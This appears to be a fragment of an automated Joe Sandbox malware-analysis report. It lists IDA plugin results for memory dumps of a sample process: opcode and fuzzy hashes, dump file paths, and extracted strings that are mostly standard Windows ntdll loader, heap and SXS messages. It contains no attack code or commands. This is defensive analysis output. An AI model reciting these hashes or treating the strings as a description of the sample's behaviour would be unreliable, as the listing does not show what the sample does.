                                                                                          • Opcode ID: b4e2e0dd96162e4772d154a8b9aa575472b9296fa2c097a02fbce339c6124a06
                                                                                          • Instruction ID: 13b3b283d1480b2df1320c7bd9cbea77a97d3652dfa96f941edd712635f6e092
                                                                                          • Opcode Fuzzy Hash: b4e2e0dd96162e4772d154a8b9aa575472b9296fa2c097a02fbce339c6124a06
                                                                                          • Instruction Fuzzy Hash: B481F179940200BFCB11BB149CC4EAF7BB6EF96750F0104A5F208AF216F7768625DA67
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-2160512332
                                                                                          • Opcode ID: 7ba82a8ef93521b70f092577d6a4cd0d5999afa21b568c725a5d6bf5cf8d37c7
                                                                                          • Instruction ID: 54f209dac79c1fb825a1f884933259efbcd918092c7939d7c9bda8775039c5d8
                                                                                          • Opcode Fuzzy Hash: 7ba82a8ef93521b70f092577d6a4cd0d5999afa21b568c725a5d6bf5cf8d37c7
                                                                                          • Instruction Fuzzy Hash: F7926871648341AFE320EE24C880B5EF7EABB9CB50F01492DFA94D7651E770E944CB96
                                                                                          Strings
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 2A0B2624
                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2A0B25EB
                                                                                          • @, xrefs: 2A0B259B
                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 2A0B2409
                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 2A0B2506
                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 2A0B22E4
                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 2A0B2602
                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 2A0B2498
                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 2A0B24C0
                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 2A0B261F
                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 2A0B2412
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                          • API String ID: 0-4009184096
                                                                                          • Opcode ID: ab77d48ab78ad584d1fe44bafa9d9ef0c9d21b534af0817f87725e541ea062fa
                                                                                          • Instruction ID: 46965d56cbfc5032fe3f2b4151209aaace60788e6441a63a541f8872735f5324
                                                                                          • Opcode Fuzzy Hash: ab77d48ab78ad584d1fe44bafa9d9ef0c9d21b534af0817f87725e541ea062fa
                                                                                          • Instruction Fuzzy Hash: 2A023EB1D002289BDB61EB14CD80BDDF7B8AB5C304F4145EAE648A7242E771AF84CF59
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                          • API String ID: 0-2515994595
                                                                                          • Opcode ID: adea4eff02e829b82031793de780cc04d79d83de4956ce7b12b9364b1d69b919
                                                                                          • Instruction ID: 41e6f31cf6705bfac32424e3b3ec96177e070cf0d24996b7509808a3568a16dc
                                                                                          • Opcode Fuzzy Hash: adea4eff02e829b82031793de780cc04d79d83de4956ce7b12b9364b1d69b919
                                                                                          • Instruction Fuzzy Hash: DA51C2725093119FC325EF149A84BABB7ECFF95250F104A2DF958C3241E774E608DB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-3197712848
                                                                                          • Opcode ID: 719d3e2b3524427d3e5e8e92e5baeb6ebc1b4704e0850a43e7208e2faab2d9f2
                                                                                          • Instruction ID: e9efa4d3caee46b255fa8a1c05e21085e7dedca0908c9f154b66482db6a2df78
                                                                                          • Opcode Fuzzy Hash: 719d3e2b3524427d3e5e8e92e5baeb6ebc1b4704e0850a43e7208e2faab2d9f2
                                                                                          • Instruction Fuzzy Hash: 85120571A093419FD320EF55C484BABB3E5FF85714F05492DFA859B282E734DA48CB92
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                          • API String ID: 0-1357697941
                                                                                          • Opcode ID: 8ea039d24ee5d1b786254cba3f1c211fca6bd710ae4f44c887e17417b132706c
                                                                                          • Instruction ID: 5adcd9b6d275dbffbb8bc05fb5985dbd07e39a8c2857e948841c38550ad133e4
                                                                                          • Opcode Fuzzy Hash: 8ea039d24ee5d1b786254cba3f1c211fca6bd710ae4f44c887e17417b132706c
                                                                                          • Instruction Fuzzy Hash: 0CF12731940246EFCB25EF64D480FAAB7F5FF1A304F058869E681EB642DB74E949CB50
Strings
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Strings
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2A0B292E
• SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 2A0B2856
• SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 2A0B29B1
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 2A0B28B2
• RtlpProbeAssemblyStorageRootForAssembly, xrefs: 2A0B29AC
• SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 2A0B2881
• @, xrefs: 2A073180
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
• API String ID: 0-541586583
Strings
• VerifierFlags, xrefs: 2A0C8C50
• HandleTraces, xrefs: 2A0C8C8F
• VerifierDlls, xrefs: 2A0C8CBD
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 2A0C8A67
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 2A0C8A3D
• AVRF: -*- final list of providers -*- , xrefs: 2A0C8B8F
• VerifierDebug, xrefs: 2A0C8CA5
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
Strings
• Execute '.cxr %p' to dump context, xrefs: 2A0C4EB1
• LdrpProtectedCopyMemory, xrefs: 2A0C4DF4
• ***Exception thrown within loader***, xrefs: 2A0C4E27
• Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 2A0C4DF5
• LdrpGenericExceptionFilter, xrefs: 2A0C4DFC
• Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 2A0C4E38
• minkernel\ntdll\ldrutil.c, xrefs: 2A0C4E06
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
• API String ID: 0-2973941816
Strings
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
Strings
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
• API String ID: 0-4098886588
Strings
Memory Dump Source
• Source File: 00000003.00000001.1773094379.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_1_400000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: <$VUUU$^$gfff$gfff$yxxx
• API String ID: 0-316815425
Strings
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
Strings
• SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 2A0B2706
• SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 2A0B279C
• SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 2A0B276F
• .Local\, xrefs: 2A072D91
• \WinSxS\, xrefs: 2A072E23
• @, xrefs: 2A072E4D
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
• API String ID: 0-3926108909
APIs
  • Part of subcall function 2A082DF0: LdrInitializeThunk.NTDLL ref: 2A082DFA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A080BA3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A080BB6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A080D60
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A080D74
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
• String ID:
• API String ID: 1404860816-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
• API String ID: 0-2518169356
Strings
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
• API String ID: 0-379654539
Strings
• HEAP[%wZ]: , xrefs: 2A0A54D1, 2A0A5592
• HEAP: , xrefs: 2A0A54E0, 2A0A55A1
• ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 2A0A54ED
• ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 2A0A55AE
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
• API String ID: 0-1657114761
Strings
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 2A0B3437
• RtlDeactivateActivationContext, xrefs: 2A0B3425, 2A0B3432, 2A0B3451
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 2A0B3456
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 2A0B342A
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
                                                                                          • Opcode ID: b0810b65521f97dedb968822833514c6c81bbe4a6373e3af2e94b6bf44f18abe
                                                                                          • Instruction ID: e3d144bbedd8d5e6484c52fabcec2fdffbd99ac565ed7b26f452c95fe08d5906
                                                                                          • Opcode Fuzzy Hash: b0810b65521f97dedb968822833514c6c81bbe4a6373e3af2e94b6bf44f18abe
                                                                                          • Instruction Fuzzy Hash: 07612432A40B11AFC312EF18DD81B6AB3E5EF80750F2189B9E9549B641D775FD00CB9A
                                                                                          Strings
                                                                                          • LdrpFindDllActivationContext, xrefs: 2A0B3636, 2A0B3662
                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 2A0B365C
                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 2A0B362F
                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 2A0B3640, 2A0B366C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                          • API String ID: 0-3779518884
                                                                                          • Opcode ID: fcc0bd3c4b653e28128d785c18b3d55b7cfdb002c7d1b9113f763690a1bfe3e5
                                                                                          • Instruction ID: 6b56b74506f30f999d71961fc5c59c0a8ff18bc41ee39bc06b02bef5e4734106
                                                                                          • Opcode Fuzzy Hash: fcc0bd3c4b653e28128d785c18b3d55b7cfdb002c7d1b9113f763690a1bfe3e5
                                                                                          • Instruction Fuzzy Hash: 92310B72D00611AEDB21FB44DC88F69B3F8EB01754F038176DA84A7551D7B6EE80C69E
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 2A053255
                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2A05327D
                                                                                          • HEAP: , xrefs: 2A053264
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                          • API String ID: 0-617086771
                                                                                          • Opcode ID: b646b4638dddebad20235375b80dee81f25dff3bd3e2aa6d64068889b1d355d1
                                                                                          • Instruction ID: dec2941303578c73db3c8684ca3c1072ba021e4b03bb10e4c51662bcf6bfe26b
                                                                                          • Opcode Fuzzy Hash: b646b4638dddebad20235375b80dee81f25dff3bd3e2aa6d64068889b1d355d1
                                                                                          • Instruction Fuzzy Hash: 2692CA71E042489FDB25DFA8D450BAEBBF1FF08300F1580A9E989AB392D774A941CF51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $@
                                                                                          • API String ID: 0-1077428164
                                                                                          • Opcode ID: b943658b33ae572c881e0b343844a16d3103daeff5dc1fda2194b0d15c62d0f7
                                                                                          • Instruction ID: ce8d02d48dcf32e89bb201ba1921f4333c2d8182db4036c8a8c8413e7736b9da
                                                                                          • Opcode Fuzzy Hash: b943658b33ae572c881e0b343844a16d3103daeff5dc1fda2194b0d15c62d0f7
                                                                                          • Instruction Fuzzy Hash: 53C29D71A08341DFD765DF64C880B9FBBE5AF88B48F05892DFA8987242D774E904CB52
                                                                                          Strings
                                                                                          • LdrpCheckModule, xrefs: 2A0AA117
                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 2A0AA10F
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 2A0AA121
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-161242083
                                                                                          • Opcode ID: aa9adde4df84c6387c8100aa404104befff31e53af7efc50f8abd811ee1e6422
                                                                                          • Instruction ID: dc9ae5628910e592d4da4e7a341aaaced698184d053b110bf00ffb111d48f75b
                                                                                          • Opcode Fuzzy Hash: aa9adde4df84c6387c8100aa404104befff31e53af7efc50f8abd811ee1e6422
                                                                                          • Instruction Fuzzy Hash: 6771D271A40205EFDB14EFA8C980EAEB7F4FB48728F158479D911EB252E774AE41CB50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-1334570610
                                                                                          • Opcode ID: e57101a5bfff260a4c84e2cd13ec573ab2bdf82810c478e181a422177c4cd07f
                                                                                          • Instruction ID: cc98317cc164edfce6a6435fdac25c6bf0288e7a238b19d7adf373c7fccf29f7
                                                                                          • Opcode Fuzzy Hash: e57101a5bfff260a4c84e2cd13ec573ab2bdf82810c478e181a422177c4cd07f
                                                                                          • Instruction Fuzzy Hash: FD61BB71600301EFE728EF24D480B6EBBE1FF45304F15856AE9598B296D7B0E981CB91
                                                                                          Strings
                                                                                          • @, xrefs: 2A03CD63
                                                                                          • InstallLanguageFallback, xrefs: 2A03CD7F
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 2A03CD34
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                          • API String ID: 0-1757540487
                                                                                          • Opcode ID: 00f9554ea7900bc6c12f0f43029524c47a5513337dcfcfd699ed53a0170d4a38
                                                                                          • Instruction ID: c4cce3a2ef77d75e399d6ee58240fac74571b10c76f2075c89c6a7e2e4ea8103
                                                                                          • Opcode Fuzzy Hash: 00f9554ea7900bc6c12f0f43029524c47a5513337dcfcfd699ed53a0170d4a38
                                                                                          • Instruction Fuzzy Hash: 835103B65043469BC700EF65D444BABB7E8AF88B14F01093EFA85D7240E734DA49D7A2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                          • API String ID: 0-1373925480
                                                                                          • Opcode ID: 5a51ad8d7e83ab023268dc0d0f5aee52725c320b838d91718309764150f4fd14
                                                                                          • Instruction ID: b517f22c831b1030169348161a895a66a6f08f952d678f87d161ab807e9ff707
                                                                                          • Opcode Fuzzy Hash: 5a51ad8d7e83ab023268dc0d0f5aee52725c320b838d91718309764150f4fd14
                                                                                          • Instruction Fuzzy Hash: D0412437980B58CBEB29EBA4D850BADB7F8FF55340F11046AD901EB3A2D7769901CB11
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-2558761708
                                                                                          • Opcode ID: 3de37b1e9530f10b951409dbdc3049909817d89da3af1e5f9968f0173d5c4dd0
                                                                                          • Instruction ID: a0914560d05f028d95afd5309075b916ff4724daef33c8de7f8e34b901e6c508
                                                                                          • Opcode Fuzzy Hash: 3de37b1e9530f10b951409dbdc3049909817d89da3af1e5f9968f0173d5c4dd0
                                                                                          • Instruction Fuzzy Hash: E111EE32395001AFE758FA24D880F6EB3A5FF4162AF15812AEA06CF256DB34E840C751
                                                                                          Strings
                                                                                          • LdrpInitializationFailure, xrefs: 2A0C20FA
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 2A0C2104
                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 2A0C20F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-2986994758
                                                                                          • Opcode ID: 63e48da7d9f473f5f878f14a67e9db7008461cc1055367421ac68353c3837375
                                                                                          • Instruction ID: 0355f8e526d9fea02f4c84d13f1c572de71cddbd47bfd70000da182b76e91926
                                                                                          • Opcode Fuzzy Hash: 63e48da7d9f473f5f878f14a67e9db7008461cc1055367421ac68353c3837375
                                                                                          • Instruction Fuzzy Hash: 2DF028316402086BE710FB88CC82FAD77A9EB48B54F400074FB40B7681E1B4AA00C641
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
